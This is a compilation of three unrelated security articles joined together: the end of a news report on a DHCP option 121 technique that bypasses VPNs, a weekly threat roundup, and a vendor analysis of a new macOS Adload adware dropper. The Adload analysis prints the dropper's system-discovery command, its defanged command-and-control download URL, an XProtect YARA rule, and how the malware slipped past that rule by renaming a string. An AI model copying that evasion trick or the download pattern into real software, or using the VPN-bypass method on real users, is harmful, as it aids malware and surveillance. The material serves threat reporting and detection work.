Leviathan found they could force VPNs on the local network that already had a connection to arbitrarily request a new one. In this well-documented tactic, known as a DHCP starvation attack, an attacker floods the DHCP server with requests that consume all available IP addresses that can be allocated. Once the network’s legitimate DHCP server is completely tied up, the attacker can then have their rogue DHCP server respond to all pending requests.

“This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server,” the researchers wrote. “We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.”

The researchers say their methods could be used by an attacker who compromises a DHCP server or wireless access point, or by a rogue network administrator who owns the infrastructure themselves and maliciously configures it. Alternatively, an attacker could set up an “evil twin” wireless hotspot that mimics the signal broadcast by a legitimate provider.

ANALYSIS

Bill Woodcock is executive director at Packet Clearing House, a nonprofit based in San Francisco. Woodcock said Option 121 has been included in the DHCP standard since 2002, which means the attack described by Leviathan has technically been possible for the last 22 years.

“They’re realizing now that this can be used to circumvent a VPN in a way that’s really problematic, and they’re right,” Woodcock said.

Woodcock said anyone who might be a target of spear phishing attacks should be very concerned about using VPNs on an untrusted network.

“Anyone who is in a position of authority or maybe even someone who is just a high net worth individual, those are all very reasonable targets of this attack,” he said. “If I were trying to do an attack against someone at a relatively high security company and I knew where they typically get their coffee or sandwich at twice a week, this is a very effective tool in that toolbox. I’d be a little surprised if it wasn’t already being exploited in that way, because again this isn’t rocket science. It’s just thinking a little outside the box.”

Successfully executing this attack on a network likely would not allow an attacker to see all of a target’s traffic or browsing activity. That’s because for the vast majority of the websites visited by the target, the content is encrypted (the site’s address begins with https://). However, an attacker would still be able to see the metadata — such as the source and destination addresses — of any traffic flowing by.

KrebsOnSecurity shared Leviathan’s research with John Kristoff, founder of dataplane.org and a PhD candidate in computer science at the University of Illinois Chicago. Kristoff said practically all user-edge network gear, including WiFi deployments, support some form of rogue DHCP server detection and mitigation, but that it’s unclear how widely deployed those protections are in real-world environments.

“However, and I think this is a key point to emphasize, an untrusted network is an untrusted network, which is why you’re usually employing the VPN in the first place,” Kristoff said. “If [the] local network is inherently hostile and has no qualms about operating a rogue DHCP server, then this is a sneaky technique that could be used to de-cloak some traffic – and if done carefully, I’m sure a user might never notice.”

MITIGATIONS

According to Leviathan, there are several ways to minimize the threat from rogue DHCP servers on an unsecured network. One is using a device powered by the Android operating system, which apparently ignores DHCP option 121.

Relying on a temporary wireless hotspot controlled by a cellular device you own also effectively blocks this attack.

“They create a password-locked LAN with automatic network address translation,” the researchers wrote of cellular hot-spots. “Because this network is completely controlled by the cellular device and requires a password, an attacker should not have local network access.”

Leviathan’s Moratti said another mitigation is to run your VPN from inside of a virtual machine (VM) — like Parallels, VMware or VirtualBox. VPNs run inside of a VM are not vulnerable to this attack, Moratti said, provided they are not run in “bridged mode,” which causes the VM to replicate another node on the network.

In addition, a technology called “deep packet inspection” can be used to deny all in- and outbound traffic from the physical interface except for the DHCP and the VPN server. However, Leviathan says this approach opens up a potential “side channel” attack that could be used to determine the destination of traffic.

“This could be theoretically done by performing traffic analysis on the volume a target user sends when the attacker’s routes are installed compared to the baseline,” they wrote. “In addition, this selective denial-of-service is unique as it could be used to censor specific resources that an attacker doesn’t want a target user to connect to even while they are using the VPN.”

Moratti said Leviathan’s research shows that many VPN providers are currently making promises to their customers that their technology can’t keep.

“VPNs weren’t designed to keep you more secure on your local network, but to keep your traffic more secure on the Internet,” Moratti said. “When you start making assurances that your product protects people from seeing your traffic, there’s an assurance or promise that can’t be met.”

A copy of Leviathan’s research, along with code intended to allow others to duplicate their findings in a lab environment, is available here.

The Good, the Bad and the Ugly in Cybersecurity – Week 18

The Good | Law Enforcement Set New IoT Device Protections, Charge Ex-NSA Spy, and Sentence REvil Affiliate to Prison

Global law enforcement agencies made significant strides this week, improving the minimum safety standards to protect tech consumers and officially sentencing two major cybersecurity criminals.

Tech manufacturers in the U.K. are now legally required to protect internet-connected devices against the risk of default passwords. The latest legislation prohibits weak passwords on smartphones, TVs, appliances, and more to ensure ongoing protection against credentials-based cyberattacks. Manufacturers must also provide a point of contact for reporting security issues and state when devices will receive important security updates. Those that fail to meet the provisions will now face recalls and penalty fees up to £10 million, or 4% of their global annual revenue – whichever is higher. The U.K. is the first country in the world to ban default credentials from IoT devices.

An ex-NSA employee caught trying to sell classified secrets to Russia has been formally sentenced to over 20 years in prison. The DoJ charged Jareh Sebastian Dalke, 32, for attempted espionage while he was employed as an information systems security designer for under two months. During his short tenure with the agency, Dalke met with what he thought was a Russian agent to exchange top-secret National Defense Information (NDI) documents for a sum of $85,000 and establish future opportunities to sell more documents.

Yaroslav Vasinskyi has been sentenced for deploying REvil ransomware over 2500 attacks, including the one on Kaseya in 2021. Demanding a combined $700 million from various U.S. victims, Vasinskyi and his co-conspirators often threatened to publish sensitive data to drive a higher rate of ransom. The Ukrainian national is charged with conspiracy to commit fraud and related activity in connection with computers, damage to protected computers, and conspiracy to commit money laundering.

The Bad | Attackers Plant Millions of Malicious Repositories in Docker Hub Loaded with Malware

Millions of malicious “imageless” containers planted within Docker Hub have been redirecting unsuspecting users to phishing and malware sites for years. This week, security researchers reported on three large-scale malware campaigns specifically targeting the container image registry popular with developers and open source contributors globally.

According to the report, the containers were published over a five-year period and the campaigns have been running since early 2021. They account for approximately 20% of the malicious content found across 15 million repositories hosted on Docker Hub. The imageless containers identified by researchers have no content, only documentation ranging from spam to malware and phishing websites.

Each of the three campaigns employ different tactics to mislead users and distribute the malicious repositories. Using lures such as pirated content, video game cheats, educational e-books, and online diary-hosting services, the payloads ultimately contact a command and control (C2) server to transmit system metadata and obtain links to cracked software. Currently, researchers suspect the attacks are part of a larger operation that may involve monetization schemes via adware or third-party software distribution.

Source: JFrog

Security researchers note that these campaigns work by capitalizing on Docker Hub’s good name and credibility, which makes it all the more difficult to separate the legitimate containers from those triggering phishing and malware installation attempts. Continued misuse of Docker Hub by threat actors emphasizes the need for stricter moderation and better content screening mechanisms on such platforms.

As the trend of malware exploiting vulnerabilities in open-source ecosystems climbs, security experts warn users to exercise caution when downloading packages by reviewing the designated tags for trusted content.

The Ugly | CISA Warns Against Critical GitLab Account Takeover Flaw Under Active Exploit

Ongoing attacks are plaguing GitLab instances this week caused by a critical severity vulnerability tracked as CVE-2023-7028 (CVSS 10.0). Confirming the active exploits, CISA has issued a warning about the flaw, adding it to their KEV catalog and urging all federal civilian executive branch (FCEB) agencies to remediate the risks within three weeks.

CVE-2023-7028 was first disclosed by GitLab in January and allows attackers to seize control of accounts. The flaw stems from improper access control, which then enables remote, unauthenticated attackers to send password reset emails to accounts, all without user interaction. Attackers could also exploit this vulnerability to infiltrate Continuous Integration and Continuous Delivery (CI/CD) pipelines, potentially leading to supply chain attacks.

At time of writing, the GitLab has released fixes for versions 16.5.6, 16.6.4, and 16.7.2 with older versions being patched retroactively. While there have been no reports of ransomware attacks linked to the account takeover flaw, CISA’s warning underscores the severity of the risks it poses.

Given the nature of the platform, GitLab houses mass amounts of source code and API keys – all of which could be abused by attackers to breach organizations and carry out software supply chain attacks. According to Shadowserver, over 2100 servers are still exposed to the vulnerability. Organizations using GitLab are urged to prioritize patching, consult their incident response guide, and check for signs of breach immediately.

Source: Shadowserver

macOS Adload | Prolific Adware Pivots Just Days After Apple’s XProtect Clampdown 

It’s been little more than a week since Apple rolled out an unprecedented 74 new rules to its XProtect malware signature list in version 2192. A further 10 rules were appended in version 2193 on April 30th. Cupertino’s security team were clearly hoping that a concerted effort would serve to disrupt prolific adware distributor Adload’s assault on macOS devices. Those behind the adware, however, appear to have pivoted quickly as dozens of new Adload samples are already appearing that evade Apple’s new signatures.

In this post, we take a look at one variant of these new samples that is almost entirely undetected on VirusTotal at this time. We hope this exposure will both help inform security teams looking to keep adware nuisances out of their environment and serve to boost detection recognition across other vendor engines.

Apple’s Massive Adload Signature Update

With XProtect version 2192, Apple added 74 new rules to XProtect.yara. While a few of these were targeted at other malware and adware distributors, the vast majority targeted adware widely known as Adload.

To put this update in context, prior to version 2192, XProtect had a total of 207 rules, with around two dozen targeting historical versions of Adload. With 2192, the rule count – taking into account both additions and removals – went up to 279, and then 289 with XProtect v2193.

While a few hundred malware rules pales in comparison to the efforts of external security vendors, who tend to have thousands if not tens of thousands of rules as well as behavioral and machine learning engines, an increase of 24% in one update represents a considerable amount of effort. Each rule has to be researched and thoroughly tested to ensure it will not cause false positives – catch innocent programs in its attempt to block malicious ones.

That undertaking would have been ongoing for quite some time and Apple would have hoped that the final result would cause the adware distributor to experience major disruption. No one would expect such actors to just give up and go home – not when there’s significant amounts of money to be made – but it must have been hoped that it would take some time for the malware authors to reconstruct their codebase.

Not so, as it turns out. We began observing new versions of Adload that evade XProtect’s new signatures during last week. Many of these were still widely detected by vendor engines, but by the weekend we were seeing Adload samples that were bypassing both XProtect and other vendors’ engines on VirusTotal.

Adload bypass detection
New Adload samples (VirusTotal)

The XProtect update on the last day of April, v2193, did not address these changes to Adload, instead targeting other prolific adware distributors Pirrit and Bundlore.

New Adload Go Variant (Rload/Lador)

Of the new Adload variants that we have seen, one consistently showed up as having 0 or only 1 detection among VirusTotal engines. This variant has a file size of 4.55MB and is compiled solely for Intel x86_64 architecture. The binaries function as initial droppers for the next stage payload.

None of the early samples we saw this week showed relationships to a parent executable, application or disk image, and none were codesigned, leaving the specific distribution methods obscure, though typically these droppers are embedded in cracked or trojanized apps distributed by malicious websites, torrents and other means. However, all the new samples embedded a unique custom domain registered with NameCheap and following known Adload patterns.

SHA1 Domain
13312b3dad9633fa185351e28397c21415d95125 api[.]deployquest[.]com
21c447cac1c13a6804e52f216a4c41a20c963c01 api[.]searchwebmesh[.]com
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d api[.]generalmodules[.]com
67a56aa269b9301981c0538ace75bec2cd381656 api[.]validexplorer[.]com
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0 api[.]operativeeng[.]com
912a2ab06d3afe89e8e2ad19d3300055f0e0a968 api[.]buffermanager[.]com
a99d03fc3b32742de6688274a3ee3cdaef0172bf api[.]lookwebresults[.]com
f166eb63162ce4a5ac169e01c160be98b0e27e13 api[.]navigationbuffer[.]com
feb2c674f135410c3ced05c301f19ab461e37b20 api[.]inetprogress[.]com

On execution, the droppers perform system information discovery (T1082) via the ioreg utility:

ioreg -rd1 -c IOPlatformExpertDevice

The malware then seeks to resolve a hardcoded domain name sym._main.dwnldUrl and send an http request to retrieve a remote gzip.

Adload DNS domain URL
Hardcoded Adload domain
headers = Host: api[.]operativeeng[.]com, User-agent: Go-http-client/1.1, Accept-encoding: gzip, url = http[:]//api.operativeeng[.]com/ga?a=1104&b=E5282DF2-04D7-C854-BD9C-9B4A98F26EDC

The dropper writes the response to a subdirectory in /tmp/. The subdirectory name takes the form of /tmp/[0-9]{10}. If the remote server does not return a compressed archive, the subdirectory will contain an HTML 404 response.

Minor Tweak Evades XProtect Signature Rule

Looking at the binaries from a static point of view, there are a number of interesting artifacts. These binaries use an external (and legitimate) Go package to determine the machine’s unique ID.

The function that utilizes this package also calls another function to shell out commands, namely sym._os_exec.Command. Although Apple has targeted both of these artifacts in its signatures, the malware still evades detection by XProtect. The rule in XProtect.yara responsible for protecting Mac devices against these adware droppers is as follows:

rule macos_smolgolf_adload_dropper
{
meta:
    description = "MACOS.ADLOAD"
strings:
    $varName = "main.DownloadURL"
    $libraryName = "github.com/denisbrodbeck/machineid.ID"
    $execCommand = "os/exec.Command"
condition:
    Macho and all of them
}

However, the rule misses the latest samples as the authors have replaced the required string main.DownloadURL with main.dwnldUrl.

SentinelOne Detects Adload

These and many other Adload samples are, however, detected by SentinelOne Singularity. Our multi-engine, defense-in-depth platform uses a combination of static and dynamic engines to ensure the highest level of protection.

While we hope that Apple will quickly update its signatures to take into account this latest Adload pivot, it is inevitable that with XProtect’s YARA rules being transparent to malware developers it won’t take long for any such change to once again be circumvented.

Enterprises are advised to use a third party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.

To learn more about how SentinelOne can help protect your organization, contact us or request a free demo.

Indicators of Compromise

File Hashes (SHA1)

13312b3dad9633fa185351e28397c21415d95125
21c447cac1c13a6804e52f216a4c41a20c963c01
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d
67a56aa269b9301981c0538ace75bec2cd381656
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0
912a2ab06d3afe89e8e2ad19d3300055f0e0a968
a99d03fc3b32742de6688274a3ee3cdaef0172bf
f166eb63162ce4a5ac169e01c160be98b0e27e13
feb2c674f135410c3ced05c301f19ab461e37b20

Domains

api[.]buffermanager[.]com
api[.]deployquest[.]com.
api[.]generalmodules[.]com
api[.]inetprogress[.]com
api[.]lookwebresults[.]com
api[.]navigationbuffer[.]com
api[.]operativeeng[.]com
api[.]searchwebmesh[.]com
api[.]validexplorer[.]com

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.